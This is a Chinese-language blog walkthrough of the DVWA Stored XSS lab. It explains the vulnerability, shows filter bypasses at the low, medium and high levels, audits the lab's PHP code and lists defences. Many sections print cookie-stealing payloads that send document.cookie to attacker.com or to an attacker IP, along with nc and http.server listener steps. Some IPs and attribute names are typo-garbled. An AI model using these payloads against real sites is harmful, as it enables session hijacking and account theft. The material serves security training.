首页 > 其他分享 >DVWA靶场——XSS(Stored)

DVWA靶场——XSS(Stored)

时间:2024-12-02 10:58:32浏览次数:10  
标签:XSS HTML JavaScript 用户 DVWA 恶意 Stored 攻击者

一,Stored XSS 漏洞详解

存储型跨站脚本攻击(Stored XSS,或称为 Persistent XSS) 是一种常见的跨站脚本攻击(XSS)类型,它通过将恶意脚本(通常是 JavaScript 代码)直接存储在受害者访问的服务器上,使得攻击者能够在后续访问时执行这些脚本。与反射型XSS不同,存储型XSS不仅仅是立即在用户的浏览器中反射执行,还会持久存储在服务器上,通常在数据库、日志、文件或其他存储介质中,直到恶意脚本被触发。

二,存储型XSS的工作原理

  1. 攻击者提交恶意脚本:攻击者通过某种输入接口(如表单、评论区、用户名字段等)将含有恶意脚本的输入发送到服务器。这些恶意脚本通常是 JavaScript 代码,但也可以是其他类型的脚本(如 HTML 或 SVG)。
  2. 恶意脚本被存储:服务器接收到该数据后,如果没有适当的安全措施,它会将包含恶意代码的输入存储在数据库或其他存储介质中。此时,攻击者的恶意脚本已被"持久化"到服务器上。
  3. 受害者访问存储数据:当受害者(没有防护的正常用户)访问包含恶意脚本的页面时,恶意脚本会被从数据库中提取并显示到网页上。由于没有进行任何输出编码或过滤,恶意脚本直接嵌入到页面的 HTML、JavaScript 或 CSS 中,并在浏览器中执行。
  4. 恶意脚本执行:恶意脚本在受害者的浏览器中执行,可能导致以下几种恶意行为:
    • 窃取 Cookie 和会话信息:攻击者可以通过 JavaScript 从受害者的浏览器中获取敏感信息(如 cookies、localStorage 等),从而窃取用户的身份。
    • 操作用户的账户:恶意脚本可以伪造用户请求,执行一些恶意操作,如更改账户设置或发起资金转移。
    • 钓鱼攻击:通过页面注入恶意脚本,攻击者可以伪造某些页面,诱使受害者输入用户名、密码等敏感信息。
    • 传播恶意代码:通过社交工程手段,攻击者可能利用XSS漏洞让更多的用户访问并触发恶意代码,从而达到更大范围的攻击效果。

三,例如:

假设有一个博客系统,用户可以提交评论。攻击者输入以下内容作为评论:

<script>alert('XSS Attack');</script>

  1. 提交过程:如果评论系统没有对输入进行充分的验证和输出编码,攻击者的脚本就被存储到数据库中。
  2. 展示过程:当其他用户访问这个包含恶意评论的页面时,存储在数据库中的 <script>alert('XSS Attack');</script> 被提取并展示到页面上。
  3. 执行脚本:浏览器会解析这个 <script> 标签并执行其中的 JavaScript 代码,导致弹出警告框(alert),或者执行其他恶意操作(如窃取用户信息、跳转到恶意网站等)。

四,存储型XSS漏洞的危害

  • 信息泄露:攻击者能够窃取受害者的 cookies、会话令牌(session tokens)等敏感信息。
  • 身份盗用:窃取到敏感数据后,攻击者可以利用用户的身份进行进一步的恶意操作。
  • 远程代码执行:如果攻击者能够在存储的恶意代码中加入更复杂的 JavaScript 代码,可能会造成更严重的安全后果,如获取系统权限、远程控制用户浏览器等。
  • 大范围攻击:由于恶意脚本会被所有访问该页面的用户触发,因此,攻击的影响可以传播给所有查看该页面的用户,导致大规模攻击。

五,如何防止存储型XSS漏洞

防止存储型 XSS 漏洞的关键在于以下几个方面:

1. 输入验证和过滤

  • 白名单验证:对用户输入的内容进行严格的白名单验证,只允许符合预期格式的数据。对于文本框或表单,应该只允许字符、字母、数字等基本内容,避免输入 HTML 标签或 JavaScript 代码。
  • 过滤和清理用户输入:使用合适的过滤机制(如通过正则表达式清理特定字符或标签)去除恶意代码。避免直接存储用户输入的原始数据。

2. 输出编码

  • HTML实体编码:在将用户输入的内容插入到 HTML 页面中时,必须对特殊字符进行 HTML 实体编码,如使用 htmlspecialchars() 函数将 <, >, & 等字符转换为 &lt;, &gt;, &amp; 等。
  • JavaScript输出编码:如果将用户输入输出到 JavaScript 中,要使用适当的编码,如 json_encode(),以确保输入中包含的特殊字符不会被浏览器解释为 JavaScript 代码。
  • URL输出编码:如果用户输入需要作为 URL 参数传递,使用 urlencode() 或 rawurlencode() 编码,以防止输入中的恶意代码被浏览器当做链接的一部分执行。

3. 使用内容安全策略(CSP)

  • 配置 CSP:内容安全策略(Content Security Policy,CSP)是一种通过限制网页上可执行脚本来源来减少 XSS 攻击的有效手段。通过 CSP,您可以防止从未经授权的来源加载 JavaScript 代码,即使攻击者在页面中注入了恶意脚本,它也无法执行。

4. 输入长度限制

  • 限制输入长度:限制用户输入的最大长度,可以减少恶意脚本的注入风险,并避免恶意数据造成性能问题或存储漏洞。

5. 防止基于输入的 SQL 注入

  • 参数化查询:避免将用户输入直接拼接到 SQL 查询中,使用参数化查询或预处理语句来防止 SQL 注入漏洞,从而降低存储恶意数据的可能性。

6. 定期检查和更新

  • 安全审计和代码检查:定期进行安全审计和代码检查,确保没有遗漏 XSS 防护措施,并且第三方库或框架没有新的安全漏洞。

六,总结

存储型 XSS 是一种非常危险的漏洞,攻击者通过将恶意脚本存储在服务器上,使得每次受害者访问时都会触发该脚本执行。防御存储型 XSS 的关键在于严格的输入验证、输出编码以及使用现代 Web 安全机制(如 CSP)。

StoredXSS漏洞常见的利用场景:

1. 用户评论或留言功能

  • 场景:网站提供评论区或留言板功能,用户可以提交内容,显示给其他用户。
  • 攻击方式
    • 攻击者在评论中嵌入恶意脚本,例如:
      <script>fetch('http://attacker.com/steal?cookie=' + document.cookie);</script>
    • 当其他用户查看该评论时,恶意脚本被执行。
  • 后果
    • 窃取访问用户的Cookie或会话。
    • 执行键盘记录、页面重定向等恶意行为。

2. 用户资料页

  • 场景:网站允许用户自定义个人信息(如用户名、签名、简介),这些信息会显示在用户资料页面或文章中。
  • 攻击方式
    • 攻击者在个人简介中注入恶意脚本:
      <script>document.location='http://attacker.com/steal?cookie=' + document.cookie;</script>
    • 当管理员或其他用户查看攻击者的资料页面时,脚本触发。
  • 后果
    • 窃取管理员Cookie,进一步对后台系统进行攻击。
    • 钓鱼或传播恶意内容。

3. 在线论坛或社区

  • 场景:论坛或社区允许用户发布帖子,帖子内容会被存储在服务器并展示给其他用户。
  • 攻击方式
    • 攻击者在帖子中插入脚本:
      <script>new Image().src='http://attacker.com/log?cookie='+document.cookie;</script>
    • 所有查看该帖子的人都会触发恶意脚本。
  • 后果
    • 恶意脚本可能传播,形成“XSS蠕虫”。
    • 伪造操作(例如给帖子点赞、转发恶意内容)。

4. 文件上传功能

  • 场景:网站允许用户上传文件,如图片或文档,并在网页中展示。
  • 攻击方式
    • 上传带有恶意代码的HTML文件,并通过漏洞执行脚本:
      <script>alert('XSS');</script>
    • 通过图片元数据嵌入恶意代码,利用浏览器解析漏洞触发XSS。
  • 后果
    • 控制用户浏览器,伪造用户操作。
    • 持续性攻击,文件被多次访问时触发。

5. 在线客服或反馈系统

  • 场景:用户通过在线客服或反馈表单提交信息,内容会存储并显示在后台供客服或管理员查看。
  • 攻击方式
    • 攻击者提交含脚本的反馈信息:
      <script>fetch('http://attacker.com/admin?cookie='+document.cookie);</script>
    • 当客服或管理员在后台查看反馈信息时,恶意脚本执行。
  • 后果
    • 窃取管理员权限或后台信息。
    • 控制后台管理系统。

6. 电子商务网站的商品评论

  • 场景:电子商务网站允许用户对商品进行评价,评论内容显示在商品详情页。
  • 攻击方式
    • 在评论中插入恶意脚本:
      <script>document.body.innerHTML='<h1>Hacked!</h1>';</script>
    • 所有浏览该商品的用户都可能触发脚本。
  • 后果
    • 干扰用户体验(如弹窗、重定向)。
    • 诱导用户点击钓鱼链接或进行欺诈。

7. 在线投票或调查

  • 场景:网站提供投票或调查功能,结果页面显示用户提交的答案。
  • 攻击方式
    • 提交恶意脚本作为投票选项或答案:
      <script>window.location='http://malicious-site.com';</script>
    • 脚本会在结果页面触发。
  • 后果
    • 重定向用户到恶意网站。
    • 干扰正常投票结果。

8. 新闻或博客发布系统

  • 场景:网站允许用户投稿或发布新闻文章,内容会存储在服务器并公开展示。
  • 攻击方式
    • 在文章中嵌入恶意脚本:
      <script>new Image().src='http://attacker.com/log?cookie='+document.cookie;</script>
    • 访问文章的用户触发脚本。
  • 后果
    • 窃取访问用户信息。
    • 传播恶意内容。

9. 第三方嵌入内容

  • 场景:网站从外部来源加载并存储用户提交的嵌入内容(如视频链接、社交媒体帖子)。
  • 攻击方式
    • 提交包含恶意代码的外部链接:
      <iframe src="javascript:alert('XSS');"></iframe>
    • 内容被存储后,其他用户访问时触发。
  • 后果
    • 用户数据被窃取。
    • 网站形象受损。

一,low难度下的StoredXSS漏洞

1,网站的功能就是提供了一个留言板,可以使用burpsuite抓个请求包分析

该网站通过POST请求提交用户名和留言内容,留言内容会存储在服务器当中

2,使用最简单的XSS漏洞测试语句进行测试,但是要先判断存在漏洞的注入点,payload:<script>alert('XSS')</script>

发现对用户名长度做出了限制,并且留言message视乎不存在XSS漏洞

3,查看页面源代码,发现在前端对Name输入的内容长度进行了限制

4,修改前端maxlength=10改为50,再在Name一栏注入payload:<script>alert("XSS")</script>

注入成功,这说明后端对XSS漏洞的防御性能极低甚至没有

5,那么接下来就可以窃取cookie了,这里使用最实用的方法,也就是窃取用户cookie并且发送到攻击机,这在存储型XSS攻击中经常使用,payload:

<script>(new Image()).src='http://192.168.23.140:4444?cookie='+escape(document.cookie);</script>

或者:

<script>document.write('<img src="http://192.169.23.140:8000/'+document.cookie+'"/>')</script>

与此同时kali需要nc打开对4444端口的监听

 

6,使用常规payload是窃取不到cooike的,payload:<script>alert(document.cookie)</script>

 

low难度的靶场源代码进行代码审计

从渗透测试工程师的角度分析这段代码在防御XSS漏洞上的安全性问题,以下是审计结果:

1. 输入数据处理

  • 问题点
    • 用户输入的$message和$name被trim处理后,使用了stripslashes移除反斜杠字符。
    • 使用了mysqli_real_escape_string对输入数据进行了转义。这是用于防止SQL注入的措施,与防御XSS无关。
  • 审计结果
    • 代码中没有针对XSS的输入验证和清理(如限制特殊字符、限制HTML标签等),用户可以提交包含恶意JavaScript代码的输入(如<script>alert('XSS')</script>)。
    • 仅通过mysqli_real_escape_string处理的输入,不能防止XSS攻击。

2. 数据存储处理

  • 问题点
    • $message和$name在经过mysqli_real_escape_string处理后直接插入数据库,没有进一步清理或验证是否包含潜在的XSS内容。
  • 审计结果
    • 如果后续的输出操作未进行安全处理,这些存储的数据可能包含恶意脚本,容易被利用。

3. 数据输出处理

  • 问题点
    • 代码中未展示任何后续的输出逻辑。如果这些输入内容($message和$name)直接从数据库中提取后显示在HTML页面上,且没有进行HTML实体编码(如htmlspecialchars),则会导致XSS漏洞。
  • 审计结果
    • 如果攻击者提交了含有恶意代码的内容(如<script>alert('XSS')</script>),并且这些数据未经过HTML实体编码直接输出到页面中,攻击将成功。
    • 防御XSS的关键是输出时进行HTML实体编码,但该代码完全没有涉及防御措施,因此存在高风险。

4. 数据库层面的保护

  • 问题点
    • 数据在插入数据库之前,代码未对其内容进行限制,如禁止HTML标签或仅允许特定格式的输入。
  • 审计结果
    • 数据库层面也没有设置任何字段约束来限制输入格式,进一步放大了潜在的XSS风险。

二,medium难度下的StoredXSS漏洞

1,进入靶场前首先reset DB刷新数据库,否则会出现之前留下的XSS攻击弹窗,这个时候哪怕改前端再进行XSS攻击也是无效的,应该服务端存在着更加严格的审查过滤

可以看到并没有执行弹窗,这极有可能是过滤限制了<script>标签。

2,那么接下来就需要测试过滤方法,比如大小写或者转义,payload:<SCRIPT>alert('XSS')</SCRIPT>

说明过滤机制仅仅对<script>做出了限制,却对大小写并不敏感

3,还可以尝试双写绕过,payload:

<scrip<script>t>alert('XSS')</scrip<script>t>

也能够实现对服务端限制的绕过

4,构造绕过语句应用窃取cookie,payload:

<SCRIPT>document.write('<img src="http://`192.168.23.140:8000/'+document.cookie+'"/>')</SCRIPT>

需要在攻击机上开启http服务以窃取cookie:python -m http.server

5,或者另一种方式,payload:

<SCRIPT>(new Image()).src='http://192.168.23.140:4444?cookie='+escape(document.cookie);</SCRIPT>

成功窃取到cookie

medium难度的靶场源代码进行代码审计

medium分析:

  1. 输入清理
    • 对$message进行了额外的处理,使用了strip_tags()函数移除了所有HTML标签,这可以有效防止HTML标签注入,包括<script>标签。
    • 使用了addslashes()来处理转义字符,这在防止SQL注入上有一定作用,但并不防止XSS攻击。值得注意的是,mysqli_real_escape_string()仍然存在,它用于防止SQL注入。
    • 最后使用了htmlspecialchars()来处理$message,这对于防止XSS攻击非常有效,因为它会将<和>等字符转换为HTML实体(例如<变成&lt;),从而避免浏览器执行恶意脚本。
  2. XSS防护
    • 在对$message的处理过程中,strip_tags()移除了潜在的HTML标签,而htmlspecialchars()对字符进行了编码,使得任何用户输入的HTML或JavaScript脚本不会被执行。
    • 对$name字段使用了str_replace()来移除<script>标签,这虽然能防止部分XSS攻击,但并不如strip_tags()和htmlspecialchars()那样全面。
  3. SQL注入防护
    • 同样使用了mysqli_real_escape_string()来防止SQL注入问题。

lowmedium比较分析:

  1. XSS防护
    • 第一段代码:没有任何针对XSS攻击的防护措施。用户提交恶意脚本(例如<script>alert("XSS");</script>)后,若直接输出在网页上,将会触发XSS攻击。
    • 第二段代码:通过strip_tags()移除HTML标签,htmlspecialchars()对字符进行HTML实体编码,从而有效防止了XSS攻击,即使用户输入恶意脚本,它也将被转义或移除,不会被执行。
  2. SQL注入防护
    • 第一段代码第二段代码都使用了mysqli_real_escape_string()对输入进行处理,有效防止了SQL注入攻击。
  3. 输入清理
    • 第一段代码仅使用了stripslashes()和mysqli_real_escape_string()来处理输入,这不足以防止XSS攻击。
    • 第二段代码对$message使用了strip_tags()、addslashes()、htmlspecialchars()等多种措施来防止XSS攻击,并且对$name也进行了某些清理。

总结:

第二段代码比第一段代码更加安全,主要体现在防御XSS攻击方面。第二段代码使用了htmlspecialchars()和strip_tags()等方法来清理用户输入,防止恶意脚本被执行,而第一段代码没有对XSS进行任何防护,存在较大的安全风险。

三,high难度下的StoredXSS漏洞

1,根据以往经验high难度下对于<script>标签的过滤限制更为严格,这个时候就需要使用javascript丰富的标签功能进行绕过:

1. 利用HTML事件属性

JavaScript支持多种事件处理程序,攻击者可以通过事件属性来执行恶意脚本。例如,<img>、<a>、<div> 等标签的 one rror、onclick、onload 等事件属性,可以触发JavaScript代码。

<img src="nonexistent_image.jpg" οnerrοr="alert('XSS');">

这个例子中,<img> 标签的 one rror 事件会在图片加载失败时触发,执行 alert('XSS') 脚本。

其他常见的事件属性:

  • onmouseover, onfocus, onblur
  • onload, one rror, onclick, ondblclick

2. 利用JavaScript协议

攻击者可以通过 javascript: 协议在链接中执行恶意代码,即使是对 <a> 标签的过滤,也不一定能防止这种方式。

<a href="javascript:alert('XSS')">Click me</a>

即使 <script> 标签被禁用,javascript: 协议仍然可以执行JavaScript。

3. 利用Base64编码

攻击者可以将恶意代码编码为Base64格式,并将其嵌入 img 标签、iframe 等元素中。这种方法可以绕过基于内容的过滤器。

<img src="" />

这个例子使用了Base64编码的SVG图像,其中包含了XSS攻击代码。这个Base64字符串可以被嵌入到img标签的src属性中,绕过某些过滤机制。

4. 利用Unicode编码

JavaScript允许使用Unicode编码来表示字符,攻击者可以利用这一点绕过某些字符过滤器。

<script>alert("\u0058\u0053\u0053")</script>

这个例子中,\u0058、\u0053分别是字母X和S的Unicode编码,从而执行alert('XSS'),绕过了可能过滤<script>标签和alert关键字的机制。

5. 利用<svg>标签

<svg>标签在现代浏览器中支持JavaScript和DOM操作,攻击者可以利用SVG图像中的onload事件来执行JavaScript。

<svg οnlοad="alert('XSS')"></svg>

即使 <script> 标签被禁止,<svg> 标签中的 onl oad 事件仍然可以用来执行XSS攻击。

6. 使用嵌套标签

有时,攻击者可以通过在标签中嵌套其他标签来绕过过滤机制。尤其是HTML5中的标签和元素,允许包含事件属性或脚本代码。例如,可以尝试嵌套多个标签来绕过过滤器。

<iframe src="javascript:alert('XSS')"></iframe>

虽然<iframe>标签通常被过滤,但攻击者可以使用它的src属性通过 javascript: 协议来绕过过滤。

7. 利用eval()

如果输入的内容没有被充分过滤,攻击者可能会利用 eval() 来执行注入的代码。eval() 是JavaScript中的一个内置函数,能解析和执行传入的代码字符串。

<input type="text" value="alert('XSS')" id="userInput">
<script>eval(document.getElementById('userInput').value);</script>

8. 利用srcdoc属性

srcdoc 是 <iframe> 标签的新属性,它可以直接嵌入HTML内容。攻击者可以将恶意代码嵌入到 srcdoc 中。

<iframe srcdoc="<script>alert('XSS')</script>"></iframe>

2,盗取cookie,payload:

<input οnblur="document.write('<img src="http://192.168.23.140:8000/'+document.cookie+'"/>')">

<img alt=x οnmοuseοver=document.write('<img src="http://·91.·68.23.140:8000/'+document.cookie+'"/>')>

high难度的靶场源代码进行代码审计

代码功能概述:

这段代码接收用户的输入数据(message 和 name),对这些输入进行了一些“清洗”(sanitize)操作,并最终将其插入到数据库中。以下是代码中的主要安全措施:

  1. 使用 strip_tags():用于删除 HTML 和 PHP 标签。
  2. 使用 addslashes():对输入数据进行转义,防止 SQL 注入。
  3. 使用 mysqli_real_escape_string():对输入数据进行进一步的转义,以防止 SQL 注入。
  4. 使用 htmlspecialchars():对消息内容进行 HTML 转义,防止 HTML 元素被解析,减轻 XSS 攻击。
  5. 使用 preg_replace() 清除 <script> 标签:试图通过正则表达式删除潜在的 <script> 标签,防止 XSS 攻击。

1. strip_tags() 的局限性:

  • 作用:strip_tags() 函数会移除 HTML 和 PHP 标签,但是它并不做彻底的输入过滤。它会去除常见的标签(如 <script>),但是如果输入中包含恶意的 JavaScript 事件属性或 SVG 元素中的 JavaScript,它仍然可能会被绕过。
    举个例子,攻击者可以通过 <img src="nonexistent.jpg" οnerrοr="alert('XSS')"> 这种方式绕过 strip_tags() 的限制,因为 strip_tags() 只会移除常规的 HTML 标签,而不会移除嵌入 JavaScript 的事件属性。

2. addslashes() 的局限性:

  • 作用:addslashes() 会在字符串中的特殊字符(如单引号、双引号、反斜杠)前添加反斜杠,以防止 SQL 注入。然而,这个方法并不完全安全,因为它不处理所有的字符转义,尤其在 SQL 执行时可能仍然存在问题。
    局限性:此方法对于防止 XSS 攻击无效,因为它只是在字符串中插入了反斜杠,不会对 HTML 或 JavaScript 代码进行适当的转义。攻击者仍然可以通过 JavaScript 事件属性等手段执行恶意脚本。

3. mysqli_real_escape_string() 的有效性:

  • 作用:mysqli_real_escape_string() 是为了防止 SQL 注入而对用户输入进行转义。它对输入数据进行转义,将引号、反斜杠等字符转换为安全的格式,避免数据中嵌入的恶意 SQL 语句被执行。
    局限性:虽然 mysqli_real_escape_string() 对 SQL 注入攻击有效,但它对于防止 XSS 攻击并无太大帮助。它并不会处理 HTML 或 JavaScript 内容,攻击者仍然可以在输入中注入恶意的 <script> 标签或 HTML 事件。

4. htmlspecialchars() 的有效性:

  • 作用:htmlspecialchars() 会将输入中的特定字符(如 <, >, &, " 等)转义为 HTML 实体,例如 &lt;, &gt;, &quot; 等。这对于防止 XSS 攻击非常有效,因为即便攻击者注入了恶意的 HTML 或 JavaScript 代码,浏览器也会将其视为普通文本而非可执行代码。
    有效性:在防止 XSS 攻击方面,htmlspecialchars() 是一种有效的防御措施。然而,它并没有彻底解决所有问题,特别是在某些情况下,htmlspecialchars() 的参数设置不当(如没有指定 ENT_QUOTES 或 UTF-8 编码),可能导致字符转义不完全,存在安全漏洞。

5. preg_replace() 的局限性:

  • 作用:正则表达式 preg_replace() 尝试通过删除 <script> 标签来防止 XSS 攻击。但是,这种方式存在几个问题:
    • 不彻底:这个正则表达式只会删除字面意义上的 <script> 标签,但攻击者可以绕过这个过滤机制。例如,攻击者可以使用不同的标签(如 <scr<script>ipt>)或通过其他手段拼接 <script> 标签,从而绕过正则表达式。
    • 不针对 JavaScript 事件属性:这段代码并没有清除输入中的 JavaScript 事件属性(如 onl oad, one rror),这些事件属性仍然可以执行恶意的 JavaScript 代码。

6. SQL注入防御:

  • 虽然该代码在某些程度上使用了 mysqli_real_escape_string() 来防止 SQL 注入,但是这段代码的实际执行逻辑没有使用 预处理语句。使用预处理语句是防止 SQL 注入的最佳实践,能够确保输入的内容被正确地转义并且与 SQL 查询分开执行。仅仅使用 mysqli_real_escape_string() 并不能完全防止 SQL 注入攻击。

总结:

这段代码虽然包含了一些安全措施,如 strip_tags()、htmlspecialchars() 和 preg_replace(),这些对于防止 XSS 攻击有一定的帮助,但仍然存在以下局限性:

  1. 过滤不完全:对于 JavaScript 事件属性、SVG 等 HTML 标签形式的攻击没有有效过滤。
  2. 正则表达式的局限性:通过正则去除 <script> 标签不够彻底,攻击者可以通过多种方式绕过。
  3. 编码和转义不完善:htmlspecialchars() 没有做到完全的字符转义,尤其在未指定合适的参数(如 ENT_QUOTES)时。
  4. SQL 注入的防御不足:虽然使用了 mysqli_real_escape_string(),但更好的方法是使用预处理语句。

四,impossible难度下的StoredXSS漏洞

代码审计其防御措施及安全机制

1. 输入数据的清理和处理

  • stripslashes: 去除字符串中的反斜杠。这通常是为了防止逃逸字符干扰后续处理。
  • mysqli_real_escape_string: 通过将特殊字符转义(如单引号 ' 或双引号 "),防止恶意代码注入数据库(避免 SQL 注入风险)。但是,这段代码中存在冗余,因为使用了 PDO 的参数化查询,mysqli_real_escape_string 并非必要。
  • htmlspecialchars: 将特殊 HTML 字符(如 <、>、& 等)转义为 HTML 实体(如 &lt;、&gt;、&amp;),这直接防止了用户提交的恶意 HTML/JavaScript 代码在浏览器中被解析执行。

2. 数据库操作的防护

  • 参数化查询(Prepared Statements):
    • 使用 PDO 的 prepare 和 bindParam 方法。
    • 防止 SQL 注入:用户输入被安全绑定为参数,无需手动拼接 SQL 字符串。
  • 尽管参数化查询主要防 SQL 注入,但配合 htmlspecialchars,也能防止存储型 XSS,因为存储的内容已经被转义,攻击代码不会被浏览器执行。

3. 生成 Anti-CSRF Token

  • 使用 generateSessionToken 为用户生成唯一的会话令牌,并在表单提交时验证该令牌:
    • 在表单中包含 user_token 字段,与会话中的 session_token 进行比对。
    • 防止恶意网站借助用户已登录的身份(如 Session)提交伪造请求。
  • XSS 的间接防护:
    • 通过 Anti-CSRF token,可以确保表单提交来源可信,降低用户被 XSS 攻击后执行恶意 CSRF 请求的风险。

4. 潜在问题

  • 冗余的清理代码:
    • mysqli_real_escape_string 在 PDO 环境下是多余的,移除反而简化代码。
  • 防护可能不全面:
    • 仅使用 htmlspecialchars 防范 XSS,有时可能漏掉编码不一致的情况(如多层嵌套的输出)。为进一步增强,可以根据输出上下文使用更全面的过滤函数,例如:
      • 针对 HTML 属性的 ENT_QUOTES 标志。
      • 针对 JavaScript 输出的 JSON 编码。
  • 内容存储的二次过滤:
    • 虽然输入数据被过滤,但在存储后输出时可能存在误用风险,建议在展示时再次进行适当的转义处理。

5. 总结:XSS 防御机制

这段代码的 XSS 防御机制较为完善,主要措施包括:

  1. 输入过滤: 使用 htmlspecialchars 对用户输入的 HTML 元字符进行转义,确保数据存储时不带有恶意脚本。
  2. SQL 注入防护: 通过 PDO 的参数化查询,避免了存储型 XSS 的 SQL 注入风险。
  3. Anti-CSRF Token: 确保请求来源可信,间接减少用户在 XSS 环境中的 CSRF 攻击风险。

改进建议:

  • 移除冗余代码: 去除 mysqli_real_escape_string。
  • 严格输出转义: 在不同上下文(如 HTML、JavaScript)中,使用更适合的输出转义方法。
  • 统一过滤策略: 输入过滤和输出转义相结合,以避免遗漏或误用的可能性。

标签:XSS,HTML,JavaScript,用户,DVWA,恶意,Stored,攻击者
From: https://blog.csdn.net/zhongyuekang820/article/details/144182556

相关文章

  • DVWA靶场文件包含(File Inclusion)通关教程(high级别)
    目录DVWA靶场建立闯关DVWA靶场建立需要的东西:phpStudy:链接:phpStudy提取码:0278DVWA-master链接:DVWA靶场提取码:0278建议在虚拟机中操作,以防数据库冲突,下面有解释安装phpstudy,然后打开Apache和MySQL访问127.0.0.1,如果显示站点创建成功就成功了......
  • pikachu平台xss漏洞详解
    声明:文章只是起演示作用,所有涉及的网站和内容,仅供大家学习交流,如有任何违法行为,均和本人无关,切勿触碰法律底线文章目录概述:什么是xss一、反射型XSS1.get2.post二、存储型XSS三、DOM型XSS四、DOM型XSS-X五、xss之盲打六、xss之过滤七、xss之htmlspecialchars八、xss......
  • 3-XSS渗透与防御
    1、HTTP协议回顾XSS又名跨站脚本攻击web页面登陆页面,往往有一个“记住密码”功能--->Cookie1.1HTTP流程1.2HTTP特点:请求应答模式灵活可拓展可靠传输无状态stateless--客户端每次请求都是完全独立的,没有任何联系2、客户端的Cookie显示:每个请求都是独立的需求......
  • 前端如何防止XSS攻击?
    前端防止XSS攻击的核心思想是对用户输入的数据进行过滤和转义,防止恶意脚本被浏览器执行。以下是一些常用的前端防御措施:1.输入过滤:对输入内容进行白名单过滤:只允许用户输入预期的字符类型,例如数字、字母、特定的符号等。可以使用正则表达式或其他过滤函数来实现。......
  • 【Springboot知识】Springboot进阶-如何有效防止XSS攻击
    springboot项目如何防止XSS攻击一、输入验证和过滤二、输出编码三、使用安全框架四、使用模板引擎的自动转义功能五、设置安全HTTP头在SpringBoot项目中,防止XSS(跨站脚本攻击)攻击是确保应用安全性的重要一环。以下是一些避免XSS攻击的方式以及具体的实现代码:一、......
  • innerHTML插入script代码为什么不会被XSS
    HTML5不会执行由innerHTML插入的<script>标签内的代码。测试代码window.onload=function(){letstr="<script>alert(1)</script>"document.getElementById('div').innerHTML=str}innerHTML插入内容不确定的字符串时仍然存在安全风险。测试代码<......
  • 【网络安全零基础入门教程】之Web安全渗透测试-pikachu&DVWA靶场搭建教程,网络安全零基
    这是我给粉丝盆友们整理的网络安全渗透测试入门阶段远程代码执行渗透与防御的基础教程喜欢的朋友们,记得给我点赞支持和收藏一下,关注我,学习黑客技术。对于web安全刚入门的小伙伴来说,漏洞靶场搭建是很重要的,可以通过靶场学以致用,对所学知识点进行巩固练习。下面和我一起搭建......
  • WEB攻防-XSS跨站&CSP策略&HttpOnly属性&Filter过滤器&标签闭合&事件触发
    1.CSP(ContentSecurityPolicy内容安全策略)内容安全策略是一种可信白名单机制,来限制网站中是否可以包含某来源内容。该制度明确告诉客户端,哪些外部资源可以加载和执行,等同于提供白名单,它的实现和执行全部由浏览器完成,开发者只需提供配置。禁止加载外域代码,防止复杂的攻击......
  • XSS跨站&Cookie盗取&表单劫持&网络钓鱼&溯源分析&项目平台框架
    (凭据)cookie盗取:身份验证(会话)session(令牌)jwt等身份验证技术没有效果工具项目:xss平台beef-xss代码项目:必须在管理员登录过后台并且处于登录的有效期间内出发跨站才能盗取cookie伪造身份登录后台漏洞原理:接受输入数据,输出显示数据后解析执行基础类型:反射(非持续),......
  • WEB攻防-XSS跨站&SVG&PDF&Flash&MXSS&UXSS&配合上传&文件添加脚本
    #SVG-XSSSVG(ScalableVectorGraphics)是一种基于XML的二维矢量图格式,和我们平常用的jpg/png等图片格式所不同的是SVG图像在放大或改变尺寸的情况下其图形质量不会有所损失,并且我们可以使用任何的文本编辑器打开SVG图片并且编辑它,目前主流的浏览器都已经支持SVG图片的渲染。<sv......